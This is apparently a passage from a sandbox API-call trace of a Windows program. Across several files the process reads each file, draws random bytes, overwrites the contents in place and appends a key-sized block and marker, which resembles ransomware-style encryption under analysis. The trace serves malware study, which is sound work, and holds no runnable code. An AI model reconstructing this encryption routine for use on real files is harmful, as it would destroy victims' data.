lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0083.297] GetProcessHeap () returned 0x4f10000 [0083.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0083.297] GetProcessHeap () returned 0x4f10000 [0083.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.297] GetProcessHeap () returned 0x4f10000 [0083.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.297] CloseHandle (hObject=0x934) returned 1 [0083.298] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 108 [0083.298] SetFilePointerEx (in: hFile=0x91c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.298] ReadFile (in: hFile=0x91c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0083.298] SetFilePointerEx (in: hFile=0x91c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.298] GetProcessHeap () returned 0x4f10000 [0083.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.298] GetProcessHeap () returned 0x4f10000 [0083.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.298] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.298] GetProcessHeap () returned 0x4f10000 [0083.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0083.299] ReadFile (in: hFile=0x91c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x85, lpOverlapped=0x0) returned 1 [0083.301] SetFilePointerEx (in: hFile=0x91c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.301] WriteFile (in: hFile=0x91c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x85, lpOverlapped=0x0) returned 1 [0083.301] GetProcessHeap () returned 0x4f10000 [0083.301] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.301] GetProcessHeap () returned 0x4f10000 [0083.301] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.301] GetProcessHeap () returned 0x4f10000 [0083.301] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.301] GetProcessHeap () returned 0x4f10000 [0083.301] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.301] GetProcessHeap () returned 0x4f10000 [0083.301] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.301] GetProcessHeap () returned 0x4f10000 [0083.301] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.302] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.302] GetProcessHeap () returned 0x4f10000 [0083.303] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.303] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.303] GetProcessHeap () returned 0x4f10000 [0083.304] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.304] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.304] GetProcessHeap () returned 0x4f10000 [0083.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.305] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.305] GetProcessHeap () returned 0x4f10000 [0083.306] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.306] SetFilePointerEx (in: hFile=0x91c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.306] WriteFile (in: hFile=0x91c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0083.306] WriteFile (in: hFile=0x91c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0083.306] GetProcessHeap () returned 0x4f10000 [0083.306] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0083.306] GetProcessHeap () returned 0x4f10000 [0083.306] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.306] GetProcessHeap () returned 0x4f10000 [0083.306] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.306] CloseHandle (hObject=0x91c) returned 1 [0083.307] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 109 [0083.307] SetFilePointerEx (in: hFile=0x938, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.307] ReadFile (in: hFile=0x938, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0083.307] SetFilePointerEx (in: hFile=0x938, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.307] GetProcessHeap () returned 0x4f10000 [0083.307] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.307] GetProcessHeap () returned 0x4f10000 [0083.307] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.307] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.307] GetProcessHeap () returned 0x4f10000 [0083.307] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0083.307] ReadFile (in: hFile=0x938, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x85, lpOverlapped=0x0) returned 1 [0083.310] SetFilePointerEx (in: hFile=0x938, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.310] WriteFile (in: hFile=0x938, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x85, lpOverlapped=0x0) returned 1 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.310] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.311] GetProcessHeap () returned 0x4f10000 [0083.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.312] GetProcessHeap () returned 0x4f10000 [0083.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.313] GetProcessHeap () returned 0x4f10000 [0083.313] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 